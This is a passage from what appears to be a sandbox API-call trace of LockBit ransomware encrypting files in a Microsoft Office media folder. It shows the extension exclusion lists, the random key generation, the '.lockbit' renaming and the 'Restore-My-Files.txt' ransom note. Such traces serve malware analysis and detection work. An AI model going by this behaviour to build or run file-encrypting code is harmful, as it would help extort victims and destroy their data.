[0202.037] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.037] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18247_.WMF") returned 1 [0202.037] lstrcmpiW (lpString1="ntldr", lpString2="BD18247_.WMF") returned 1 [0202.038] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18247_.WMF") returned 1 [0202.038] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18247_.WMF") returned 1 [0202.038] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18247_.WMF") returned -1 [0202.038] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18247_.WMF") returned 1 [0202.038] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18247_.WMF") returned 1 [0202.038] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.038] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF") returned=".WMF" [0202.038] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.038] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.038] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.039] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.039] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.039] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.039] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.039] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.039] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.039] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.039] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF.lockbit") returned 79 [0202.039] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18247_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.043] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.043] malloc (_Size=0x40068) returned 0x3df0008 [0202.043] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3432) returned 1 [0202.043] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.046] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.118] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.118] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.118] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.118] free (_Block=0x1fa2ed8) [0202.118] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.118] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.118] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.118] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd364c00, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbccbe2a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xcd364c00, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0xd70, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18248_.WMF", cAlternateFileName="")) returned 1 [0202.118] lstrcmpiW (lpString1=".", lpString2="BD18248_.WMF") returned -1 [0202.118] lstrcmpiW (lpString1="..", lpString2="BD18248_.WMF") returned -1 [0202.118] PathFindExtensionW (pszPath="BD18248_.WMF") returned=".WMF" [0202.118] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.118] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.118] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.118] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.118] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.119] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.119] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18248_.WMF") returned 1 [0202.120] lstrcmpiW (lpString1="ntldr", lpString2="BD18248_.WMF") returned 1 [0202.120] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18248_.WMF") returned 1 [0202.120] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18248_.WMF") returned 1 [0202.120] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18248_.WMF") returned -1 [0202.120] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18248_.WMF") returned 1 [0202.120] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18248_.WMF") returned 1 [0202.120] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.120] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF") returned=".WMF" [0202.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.120] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.120] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.121] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.121] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF.lockbit") returned 79 [0202.121] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18248_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.122] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.122] malloc (_Size=0x40068) returned 0x3df0008 [0202.122] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3440) returned 1 [0202.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.123] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.398] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.398] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.398] free (_Block=0x1fa2ed8) [0202.398] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.399] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.399] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2f4300, ftCreationTime.dwHighDateTime=0x1bdcf23, ftLastAccessTime.dwLowDateTime=0xbccbe2a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3b2f4300, ftLastWriteTime.dwHighDateTime=0x1bdcf23, nFileSizeHigh=0x0, nFileSizeLow=0x8a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18249_.WMF", cAlternateFileName="")) returned 1 [0202.399] lstrcmpiW (lpString1=".", lpString2="BD18249_.WMF") returned -1 [0202.399] lstrcmpiW (lpString1="..", lpString2="BD18249_.WMF") returned -1 [0202.399] PathFindExtensionW (pszPath="BD18249_.WMF") returned=".WMF" [0202.399] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.399] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.400] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.400] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18249_.WMF") returned 1 [0202.401] lstrcmpiW (lpString1="ntldr", lpString2="BD18249_.WMF") returned 1 [0202.401] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18249_.WMF") returned 1 [0202.401] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18249_.WMF") returned 1 [0202.401] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18249_.WMF") returned -1 [0202.401] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18249_.WMF") returned 1 [0202.401] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18249_.WMF") returned 1 [0202.401] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.401] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF") returned=".WMF" [0202.401] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.401] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.401] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.402] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.402] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF.lockbit") returned 79 [0202.402] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18249_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.404] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.404] malloc (_Size=0x40068) returned 0x3df0008 [0202.404] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2212) returned 1 [0202.404] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.405] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.405] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.423] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.423] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.423] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.423] free (_Block=0x1fa2ed8) [0202.424] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.424] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: 